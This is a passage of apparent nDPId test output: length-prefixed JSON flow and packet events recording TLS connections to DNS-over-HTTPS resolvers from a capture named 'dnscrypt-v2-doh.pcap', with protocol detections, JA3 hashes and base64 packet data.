ss2dknfVJUGkTZeyaziCfo\/hUPLXsYyHku+nVEJbqNRpQOhPnb2jeGQfmWpk2og0U8kSEHESILcSFehIwO8Vb02doDEPxmjiluOoiNj8DTjVwesJzOCze3nnZ5thxuSrDhczvTCxNeMi2LoAi6IHJwv6yKmP3cCkUEWe4z9AbWZf4hUxJmNVNy5Q7vVV994JHX8omBPWK038vtH5PW7a2OYFKIdjI2Yz6SzJZ+OqlYbYFCmqa0c1eGXVB\/8TqdStQuai1fU0TE\/mTy2FB8c7NSR\/VKsBC8I6sIjqPn9nPpsLX4Aa5DuM2tqeuJozI3MGtgrFFDrWyvjyt1h\/ISepVOPB\/T+JPzE5fwBCeACmNByH9IK2FVF9+wHSMnDH3Rdcgq4pgz6QU4cUluqyfpyzHlgAE9GfUnMqJiECiCuREVqACQxSZ7sa2wTa0di8dAGzoqN4wIPrx\/temySP8MWqmu\/laj2zLNnRd172onl\/m0hR+U8Hv2MACSDGStNO4O5BZwFSeic72yCVIqhVfsgHETqQg8hlMMT17c\/Uj9ao0O73iw5Wjk\/7cB+lK3LZb6byC2wyyD+pd3TtLmM3qgg8MtUgLGKfhsIhfUQTp\/XqEKFU5NCsHHu5VZEHHRdrJOXdW\/pdNLP05EW9nsN0M81ZPdlsv4so8uNoBrTLmnVUIf8Xa\/+SxfhPXt5a7K9AzUWWAjnEVKewBClu712Lm3rXDDG8akrRqhMVator6IljVQJj5vEGH7cBag89maUZ4A+3FglL2gnFPZqquwNwRZ\/3ZI\/mK3YEJZaZg1I0ttRdpLCWXjXUB\/Ipx3mzzk088GloS95doYpwADCEaNRAt8ezUks5kQLYjOijiV4kNTL4MxFeNVH8TtI\/eKEzXoMQeONGsl0ElE1PvGiv8WDRmkmPVWFKUutMd8AsdJvQyoKp4+YBesIZnfv5oqwoZYzY6xW0eyUs26A2QPqxn4XpA6GW55Ed1urfGB\/LM4y6m1PQnCV91nOX\/rijw0hyc632Jc4nJK2Fy84ObW9S4LluL+dKVbnJwm07LENwwbm524\/mub+gizMq1y+sluBrCe\/URmcV1qijGxp4HTb+RHA1oHAF\/FwkQx5VCNkGEMN0VqUf0AhXzQ7n792nY1bKlqBB5bwOJqseO8f5u7xOkvAJgvo15UUiFg3Fs2KF6ThIQ+YMon+lnrc8ic+qxARfjEb0cUl2zxPZdn9Pk3JDZvc3FGGanhfOsuSbbIvGq9hrnu1dWnHdMIQG0tNqt5ibv87oqeA73DYcjrRkRvnmr+NgiyzjsYvnZnavg2SVhWLOyeYi6z6452amFOWjGib+uO3a6rOPS\/dTZTQ6OPLUcWKxkXHJYeC+Yo0LWKJwuFiHg7pi2FgUOZ1c24VzSrIDORj9fOesNSZQSAFwMDARkW8VkjAKLO1iVO3Z32JB1I03p1Xf19NsjcozTvJTA7tEC3r\/iX403MlEBRFX3aGlXo2cYSoUTLuYUpZWzaPV43zoko1HlYoj3YCwOBNXEdg1n9iG9nfj9q6\/IWDsPyy9SboWjcQJVD0zE5qJ8DwGucAIvsQ7D0zCtLvnxWjjpqSDdb9tOBYDpaZBZU8KCwR8LHjkKDpJkQyCpohil6861j3biEmWgZIX0h067Jmu+\/GI2jSqgEcF0VdDgb777Odt1jnDUv6rPpys\/KpOKpGwd1sOOD1atUuwZ2VWxJpoQFOVZofLGtGDAGLonrwSCzj9\/ObIFITDrXAwr6TE8\/SO2citlABmWDWJNFMQq1IU16fmzPW9wZ2jhYPxcDAwA1KFs5Si96rO1Ec9S06xPPSvxONjZOZ1eDJyi5V7B3adcTvi5GDWF42J9ne7Y2tNbnJdDWBMM="} -01090{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348407,"flow_last_seen":946739348519,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":3384,"flow_avg_l4_payload_len":1692,"midstream":1,"thread_ts_msec":946739348519,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":946739348521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739348521,"pkt":"REREREREZmZmZmZmCABFAABoD1xAAL0GdBEKAAABlTjkLYysAcV+b2UT8dMaQ1AYAfU6fQAAFAMDAAEBFwMDADViidEmWrIRj1bupCYNTHJ+IR+sbSf6KT90A8qW52RQBURyQL9vFT6E9CFjlI93BJu2cr+zKg=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":946739348961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739348961,"pkt":"REREREREZmZmZmZmCABFAAFIPztAAL0G074KAAABLZm7YJSCAbsJfFJ\/n27j2lAYAfaq8AAAFgMBARsBAAEXAwMZV\/YJsl1KDGHp6vinUuSzBgwYUj7HikeN2yT\/6PXJXSCCG8AdBIamvVFUtiPCGd7atl\/XGLRDF4fN5wiY+j2o\/gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zc2UuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AILqIx\/2aPwjQ+1CtVREnVkbTOyfaXxjQI4MYF1wNoZlj"} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":946739349012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739349012,"pkt":"ZmZmZmZmRERERERECABFAAuAVvpAADYGOMgtmbtgCgAAAQG7lIKfbuPaCXxTn1AQAIO1KAAAFgMDAHoCAAB2AwPVEzRRR6mT0E92uybAnGbGZWeWVD\/m1\/eNOhfsedWm3iCCG8AdBIamvVFUtiPCGd7atl\/XGLRDF4fN5wiY+j2o\/hMBAAAuADMAJAAdACAZ+iIImd19O1rP7adwYQe9xC\/+1jN6jL9eBLofHG6SbQArAAIDBBQDAwABARcDAwtedm5F60tr1KSpSWgXMdmmX3Ys4sUEWudZbc\/GVmqkUsaepFDQQ8mcPIjegsJEHlTqywqGyBqt0c8EFI9PK3y9wMc\/+3ozr1s1L0Jd42MTaMhOndcbb8aYEnSYi\/zIVpLn6qdOkfyxUEfDDwQC7tdpz8rWkLOD8s1Gc\/+GapP01LuZUSoxJKMEPFivq1rS7ax5uSaTQJul+x0Q1A7WKBQI96lxNlKhu8S\/F6aiQdLb9bng9LygmgdlJ0IMNTAzSle754kwT44x6hxHdY+dgL3FfpB162mfDfNtflZ3mHhPTnkpYtlwwqsdseLzRBUZP3Q4Ja18aDfnLKv6lwZqUkYqVbKbxYZxo1iV+7HgYRo00AC9h97+\/fjdDvQp1\/ZlgGZVor6fI\/2UbNyKd+CKXq\/WxiWd3cfOC5mfsohQgZfh0mCkf9dr3uz3ujKCV4y2skvjk\/nvMYWaCk8YYJ09fpkBhHkvDLX34BQkxdq8SFFlf9KC0xLeicU3h\/prF3BxKbFcEuJVsTQ1IwCvvKPttu9bXK5Pot+r5ctGacxaL2PbnIguGLNO3oXuqP1Q9c+9bIOgs3SrVqvTzY6u7z71LwLT4lIRUT1tdFuzNBsI3uP36b\/9IAg3kdqQ6B86AhSq6s9YI9cVyIl6Ij\/v4hTBVX3z6+HeVN1ZOCnsTQ5pzdsr1wh7Urw2Dq8ujiDkOD+Fou6dMOYoID0SKEwKKw1eszHLhxLaCFy\/r3d7Go4MVMtt3WT79fbDbeLxIVt3hgCghutkKtcuHd5chD4oLWELh6tM9hPl+4nCK4m\/+O5cbKg6OL6jCTY\/gO0DykmoFGAjlffWT5qFPKGIHd1y6jfLFBTeg895J4XJsRYeS8WWpPvi7T\/OrrEOEoSups8MYg4y47m6jBSiviaU3Egrqb9OmbARusmAkBOc+b7sPEV3vJ7rmbEmSmp9es6Ma1hTLKZ1zLv5y87EpErdv2GmabDERgys3rQli1zICByjjT3wKTtOmnCFVus\/kEZ20ZKIT3R1SBoRFrSMK3NkxEq+liNvGGcf+EHNQ14qDPBLs0m+Amz59cCkIeFxK62ZDg\/D8+8JoEQZlyE9AWaFti+8vDVxBObTHdc9i3Kw7ewteJw63QBC9EWl8n8clagy9wb+UFjl1FNsicAfIiO1Xs\/Zye+Z2EVvEt6aOGsYYXUIiuSHHHy+OTANd5q6FtSmxH5d29V\/RRYtUF+RFNqvu7jCJbpfY4CMi\/uFQpCXgIsM\/FuZw9ietB43gXYBJPigmUjQOJrnl2aOEVZN25twSZkyFkDyfGhTbcdXECqNFF8TnC98sE4z4cSyaAj5eIgD8KWiILJX2yoi+dB+VLGxM9ljCfyywhEqQD9FxwMPenX20RdEq43Qg2oM44SbTOcaPyRK5R1+UoArEareBxTtwbIj1\/gYPRWTkZ8pK7ELTpeDzq5dz0ptJVwSUIH0JdKkVE3RFHc7LCdWysSVUeFYgHXl28Deq1y2qizxSTQTQGj788zPkj9nRqwsew3ffxErP0pR2erOmxzmRPzUcbJ79H2yupuK1CFndSabVcPzkp0n+2KlKx3Rn8tyf\/hn5qm64LAaVaGFpUoNBQQlUEAUYg9kdMVxRV9nD92+mrKa+2JReRncweAA5LhgzrfrEPwyc1B\/FBpBxwIyV7Xy5RQehy\/n+t2tqgDOZsROSPZV\/c502uShsqQ80dFUM5RKxh0mzHQFM0OK4kAUJhq4wyFBHR892ibgw3EufqDFUX7y2fDW3v9sHJ0PjEBQf0Z+LPQlMJXmUS7wgfHtNIgpjboq9\/XXfFayEzII5Ncg7bWrTiyo4JZFWiVHcfds+TlAJ90V8nR81jNjJjiPpWGiw\/wBoLReBkDgcemdC73ykLweu4Hz14TsLOSuTZsu5EZr2HV10q+61hH6ogeRQcst3XaFzwE6kceLYfEcwH6tnp0hMB9x62cNInT6JQ8Ps6Dsa1MRUtnCTsYL1E0KIBY7R9nY7dSZJpv6\/qCWpPnVEfxATo177u2nsXiV3PW6LNV3vcyinTzbbKWNsqHSX\/Rxrwf+OdHXgpeBX43CwbB+Rl\/n0BchEVnzKV702Gf9HUv7cdBb0q\/i8hYFIFBzZttYWXxvMMCuX5vFFfZ+rdfdvsqESgmVU60GNMEWlpOcj4wiK5O4Sufp7t63lXuXFEGAyK\/zCX6bTsoTK5InJmYeoxH7z6vro\/3e6Rs6NXLtea8yb94qYkPEVBEqGEipZDsyb\/R\/lWwE43D7Aub6g9hkVbl53hLJGZnLMYjNGkky7jnCfZMKDiaQ3bMKv84lVUSDkp3sK9qeuBF1mmZVLhv9HAxir3SYBNQzWsBGcCUpO9xkV8FP0kj\/iTW\/FfLKk\/DKd+BUjaxMV2uhSSQCmVokip5q8tl9J4DEAniFz7fyP2MXZu9ul4s+9NyHUnr96E7oyJz9targa6lIbTNrabDpef+RQ95Jg3dEACMFcNChtfiB\/b3jxW+VTLzdeEUKMhmN9RiB66l3ilE2UeLuKgX3mDdaXzGma9QHxu929MG9uV3gmQHGDy5TCH2vSSxC6z2\/OmzDacBVelfY5Epw7lZBVVGZZnkHXtDZ9aRkPwQ5ycPlis7xyXgrmjnzVXCU2sPi4g8aIZETiD58CL1o5eQFVuuBNN+YXqwNw72pWFPr7n1hEhwv6Vw12CTiC6plOVTlmWo7Hq2\/pHWhiu+RR5lh+vtYdVwTRC30+fnyRct1ka9vbNMqvCrrwxYa5D5R79sdMZcHtogzlIhlvBA\/hEtCrwDCOTsOVV\/YHdG3yKWN4O6RFwnZZifYo9t6777XaaqBBnRbmAIh24x\/s0cQdV+c5CkmqhwnyVXuFfH9t0XQ1553XL2pziV2ZWgjNschuXZ58zhktYtAMF0VjgYyEW7jDxhCpc\/J+cRaztT52A0ytvkRgmQaVyJn+aLdW9sCq3AlQ8gfIfMUsOa4qrrfYi\/W6wC7p\/JpUVApLzH2mKuhH3cCajbIykaOD4hdj7uAYv5ROV\/V+1+PXMG5ia\/9hbHOgDJFO9d9IqY7KSn3C+1mBqumfNrcdhFQFiTH43iJKL7gLi6km2zN5cYKZjrmjbjv3JkWSUwYRpPDfBjgX5JiTKnp6do79w4bx6CpetzdKmLMsuX1smdlFu3kujpvbqv6a1KH6F4pTm1MQ5RJmmfgdquxg6OsIIvP\/kEDn+LVg8ZMm87yYyquFkOWwe1Uj\/Vi3kL4fPIR5niD5XVoEWohLwDdVCqKts+2P1GYyEHqQAMrqWmQegZl\/LhTQw4INPlPDFEm0yb+KBOh00ktbHzCM3CFPGnzYO3alldd67nq954eKLkUOGB9MeSY7cUwdbulO4dr11zq3CmOecqOMxOt2f\/VIopIebzlUenef+vRdxbO4ewVSqUhsy+yoPWXBOpZPgLhhY3LxBP7ooDeCCIO0lcZB\/CBSyUEgiFK4lZ3kAGz8uFt3A\/vRHHEykEvXspKCwmakvQLGtne7shF+m0j\/3K2vxEjTMcnD1pU47tDCPXW32n5d+GKj1kQXvMBCTdCNuO1i0NSTDkuKc7j5+f6O6RyusC0fFzTP7MVdbXFBb1omPMQEuUSj0+hj0rK73sjeV5xq8OVFpFoURjJ2NwQsCAu\/jAm112150nTKknyPg+N6HqbvoOC0Wpkh7IwnBnV+fSTZjZ4AEkEeoKm"} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348961,"flow_last_seen":946739349012,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739349012,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":946739349015,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739349015,"pkt":"ZmZmZmZmRERERERECABFAAC4VvxAADYGQ44tmbtgCgAAAQG7lIKfbu8yCXxTn1AYAIOAngAAUbudk7Sx467B78RwxwixN7WbszxDSJth5tiFKuiBrGoB9KFJtYBVt1C9rFJk5PyiCKlQsUVoHGHAH28fXEOq226wLx4N\/Z5eAHXlqMB6V1mSenxLPr5ItjgHCvxui0hIr8CHs4BD\/dcyFi\/lJAfYyCLIMg195o3ptTftZf8UL\/yW+5j1eIJyx2wYxG1Bmojg"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":946739354159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739354159,"pkt":"REREREREZmZmZmZmCABFAAFFsX5AAL0GP4sKAAABuetRAa5gAbtwXMMeYngARlAYAfbM4AAAFgMBARgBAAEUAwPEqi+8SizamcFZuiOMoqnZy7ZEtN03UH+nij+VYBL3GiAFdLPwuVYC1BfptVDzpRdMmd95Dbs0SjTzk4T9Cfoa3AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmRuc2xpZnkuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIAlFpvTRrkboC35Gi6Kti1ZQzFT3L63Tg7Ad2VS1Z0Nh"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":946739354179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3168,"pkt_l4_len":3134,"thread_ts_msec":946739354179,"pkt":"ZmZmZmZmRERERERECABFAAxSLpJAADQGQGu561EBCgAAAQG7rmBieABGcFzEO1AYA+rX7QAAFgMDAHoCAAB2AwNebHWZixx0UeVpRBPFfxfOwpvxbfyV+ENeQi\/Un6YmQyAFdLPwuVYC1BfptVDzpRdMmd95Dbs0SjTzk4T9Cfoa3BMCAAAuACsAAgMEADMAJAAdACB1L93FSUikFZRCKYl+OoNXGHhZBDYuCiNIjz\/6VCChXhQDAwABARcDAwAgdZlJOwY6+pChCwvT27tLGZnet+yerzqND\/r13r3OLdQXAwMKE5aV9MRHEDXFawxN2Z6ZXTlxr30g5cib8A44fkQ64oQQPk\/j2rM6co+1b6nblkLeVstFbtdteXwKa840eY9TBhZcpregM8Gpq1oOWaP3aNoy3x0m7PtgdMXWTRJ7rBzMj95YpQgnRNENvlH3xRXTNJuz0OfawrfLZMK40dTY8qdEtSvVWaOv58OBFTZzds8x7Jv0lUMqTicPkVrWkLGPasMnh+a2IVbs4dzr6AhsFrB+RZ1Cwi3B7S6zzr3HKx3FQGuVtHh19izb6w3PsdZ173iclTsS5Bteswb+0EdgltfMU7tCCWlZhlMw5cbiqzX6GLMdzRL4kMNW6gZ94dTc92SBIwy+nEoGbWZhqTeDuHiAUARf+gliy5YoFjW\/PRAypf5PMRtEZClIDkjH3prUoCFGtLR5uf4Ro0aKo3ih\/KCyAGbVEIvG4bDrcfRxO0cIiVz1g0D8AUPbTDsJO+EPspEYZgIriHIBYFx\/k\/flIHH3EjcpqIe+X8XzMf\/XqWL46qAhN1cBUZXyVc3ZIhpeJ7ZcaAbPdH2pnTMTM+2Go4igirnaKWq3AflEDkSSdueX+UQOyAZUkd6Z\/x1Mwq9Tb7hXL6vtOYcRcpywMzYkakngWETbQss0CojZbN6WAPS\/E+Yya6CgGI5Mt3dulPgu8jNdumumeB1P2glp9qwQHuvHZ1QS+cPtS5x1raYCp7T5sLegZ7EBanNjOEnVAU4IhPuW0ciFUM9Mj\/BzgDWE\/hUdNhPhhQjiaUBq7VyAXKWvyO4Dx2Fel0gu0u32uA\/SHIYv4dBAj17ghhBMv+sGNC8NMtNWhv9aqIp0FgaNgTJ0u6ZahzAQoaba8gKEvhS9MXrxWiCXAHjt1VsuslTiTWmDXRn19O8C7v9DYdY\/x+ZHYaRltrJ+iDZDtT011nG9MjUMy2gT88psevKL0b5pLEr8mJZKye0N3pZbPCi7mofLMsInUgCJYAIJe6z94EV17S9g5MdytiaRjgrDRHDrubquER\/+3IoTeZlSES8Dx7zlXZ1xB0O+hR5nXJGyIskMCiVwzAersZ9n8hiUAXpNADMi79ZOaHWxepo2ogdjtLk6L5RJOzsW\/4O9s\/bE+P+1smYJ8Xz\/vrKCk0smpZMpgO1UV8s8gCIdy3Fy602DcQY72cCEk\/bea7v72CbMggpz6myeQuHNx9T5ZrAHxOyDqp4pkMAhTfD0dC3xg5zkOkSQr5pJx6ievuDl8+wenRgTssVF8J1H1XRwU56YwKhMsgqTn8eD+cywTh5zCo9dNvl9ZfHWmV3Mdg4aJz1dYzmdkUhSu46Md5G4HmOnLwI\/XQbyhHcZ2WUU9mvD9BvjP9kn2RjUXcRT+d\/cwjt2Esxb2ENHpq2bs5raN\/CIbWH\/kUQRUUCpYL9CdmiBZpRtJPrOXy6iWAKofUme88d2tr7pTpEzcTLRU5BoYhPgOVQbcXw1q3yaTUVQB4Wvp1Zu7ruywhz7ujDaUupe4ypGeBHoMNq\/GonbnedBdKUd5q1Hau\/cYgTRejjU\/rutBsmd1TsWFTtw4Narsizl07q94yxV1+nrTG1gDq+RefJI3JM3SA8ccXZmrC6\/9FsgFjt+2cDWt4JB10cFksHu2\/ml\/dASyc2jx2disClcngjvd0YpBOF1xYxILWWqUHc2SCZLZ2Aroa1pMW21jKFGB4Ar1xpSSuVVcPsSSozoKj4\/j0FvDgtwJoY1rK5ezs7yUOh0iG7\/TmlCa9VwcqKlbka3ucK+EV23eB8BAhdfkU1ZRvrzop+h56cTHnAqdzA+huEFkYic20FxEaceaf8SUoyM1\/uxur0377YEwqxCUCLmkpdjf2hKaG2o6w6dX9vCExiNhM2Jlol1IlMb4fWmsojPIiIMoMr4vCBzw+JJJUMfUwOy6sleF+nP5muuQ5rVTMwbb+OCuGE2jDpUYai822DbFN3NNQkq3i2+StVf9WCISeMMwfPk+unXE38SgIx+97\/gooknQY70IX3TsgQKFcc1SEcM6rgwk5pR4rwHfer1xQNsM1RKZGf8xeZa+ag2yg\/IxDT4LymayHchHxdaigJz4AcxjPrNuXaoi2s3E1xPh2H1clb\/ZJJwrzY7BZjc1TQovWjOw6wm8GHMHRYPWaLpFhaLJX6iixp0BBfYBFzNmIvcsaGPhpGQIWG8LNHl1vR+XYpcJzMWemerQw5\/TiIwzhe4xLQ3Ee69tOX2fKhT1GAVUyB0oeuLgjlb0FpWzQ\/lyORIy\/GJNnRuRgdZy8RNv03eZWNeLTHNU8amNvoSqoCJx28QcG4ZFWjkiBlGlisQg9MS7LfxB5YDcM35ukvbr57gX64nw00G3GJe5JnYnqeIHNIuWQI7nvVvBHP3PfWTKRa21nyK90D70j+bxIjA68ylRrcDSlrq9zK60l62NWR551fMFXxuoHTFc7qQ+K4J0ESDuqw7x47BFgsRGeVuVNYexUC0TU1lBMwcu9BGg+0G0+duPvOP3aW+jzZAhqEMopcx946w0BTw\/+bJ5qiZX+nSvNF+IzKPfnXq7G+okmmjpg\/ianwcwtjvgrAC4pnZGY+m\/27CyJiTEi9fYvN2T1KGpFt19LfH\/UKHKmZdKRHhHpgpAUwyz0ixR7JCGsZBCNp7SmZtoObLBfKyYFLS1OdeJn33VC7QU5ZIB0TIGMOnasD1IIceFavDDD1uWjFat9U8TSvdQkrVOP0H+iiog+bscrfkzNeLsrOj5JaS96ZDARUESAXVBQE+wq3Z0J6WrNdNJCanh0R13lIIfbBO3tp1JQaYJcU43NTOBatEStIgR6pggN4HF+DO2dNPqB6DJlllwkNWiMSwaSg\/Qokswn+fLJvn7pPXb8ILKczNLht2jz9aEp0+I8QfJ9sljCRmG\/qdZknc3MVkUZCxQWgeYvnw16OCgKVrO7aXg97ZXgFQywgIz4XcG4cQlmlUgZ5vBckLpEq1wb47O2DC7oYeIkB7WvMn7pIP5qKMmIewtCOip18QV5mNZQ7kfdTHrJyhNEAXbfaMkBbJyAVJGCBIYwvhIF13Izb7B6Cmnolxq1r5eurWQOB44xUuJop6m5Nm5hxmATag\/xOQnBP8r2vNMxUihmUT8anHH3UfjXAY915xtFCA13IdATjUK5r\/nOjWuYELtJmgRJ2oeyJFl+xU3enOifKqvSW9w3npBMuO6+ND+s2KXgdXZpDonBBs70SsK8NzgIT\/8A0se3txfhbwpY2EseDOLiVbMtTN8WhjrhnZpDEjzwdCV8jV8ki7+xTW6Ae32nBN9uRAZ20gpXPNrrgk+1oPaXal74NAuojgux90nmy7fGQvJ\/CCkJUFP2+xt7moAmNV6Bvh9GIV51tdhbag9+AtGmBI8WUGXz9QPwduT4nOO+Ia6cTJuP1+CL3tb+p6ijB1Jg583CQ8vtkm3Pw8NXcvYMcBOIpsKkRrBsD67+irg6nQFwMDARkSIsFlIX96rBVOSHF8j3nD4OzTmAKQfrZ20qhfNZw8PH0q41dWeUeDXwstCBpDPbSnxrC2ED\/1S7AKbK3628b0BuTXrCb9vI9IIN\/fjnNzXGCyCTfNGyQC7Z2s3ZZgGilAyQTgWS6IBv0X\/cXimIPEtNGeEgUfHp2ZiHChqtgUwdJbYZhYRpk9Vh4PP\/G\/geKDMJuF9LkfMNZa2A5\/kJwnnbAN+9JGdzxyQUZGqq8DCQqxQ4uAbnIJmcLNJBx9PHCzhhj8vk0E7hUaqEkvClX1iiIhNhFlmQ9FsqBvx5KYUvaVI86YI314BKZUdBn0Gn9Psqh3g3PCqYbuhSA+KXAHAB6ifkPpQbZxhpKA+yQN\/aKxaWBvyR8fvBcDAwBFUlHyM0i8a